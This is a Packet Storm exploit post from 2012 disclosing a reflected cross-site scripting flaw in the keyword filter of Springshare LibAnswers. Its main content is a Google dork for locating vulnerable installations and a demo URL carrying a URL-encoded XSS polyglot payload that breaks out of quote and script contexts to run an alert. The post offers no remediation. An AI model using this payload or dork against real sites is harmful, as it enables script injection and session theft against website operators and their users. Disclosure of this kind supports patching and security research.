LibAnswers Springshare Library Cross Site Scripting

2012-02-06T00:00:00
ID PACKETSTORM:109478
Type packetstorm
Reporter Sony
Modified 2012-02-06T00:00:00

Description

                                        
                                            `# Exploit Title: LibAnswers Springshare Library Cross Site Scripting  
# Date: 6.02.2012  
# Author: Sony  
# Software Link: http://www.springshare.com/libanswers/  
# Google Dorks: browse.php?tid= intext:Powered by Springshare  
# Web Browser: Mozilla Firefox  
# Blog: http://st2tea.blogspot.com  
# PoC:  
http://st2tea.blogspot.com/2012/02/libanswers-springshare-library-cross.html  
..................................................................  
  
Well, we have xss in Filter by Keyword:  
  
Our xss code:  
  
http://codepad.org/LqL68vIQ  
  
Demo:  
  
http://demo.libanswers.com/browse.php?tid=0&f=[our xss is here]  
  
http://demo.libanswers.com/browse.php?tid=0&f=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E  
  
http://1.bp.blogspot.com/-i-ou8k7YbpY/Ty__2hD11NI/AAAAAAAAAaw/DWcCzOLPwi4/s1600/libanswers.JPG  
  
  
..................................................................  
  
InSecurity.Ro  
  
Because we care, we're security aware!  
`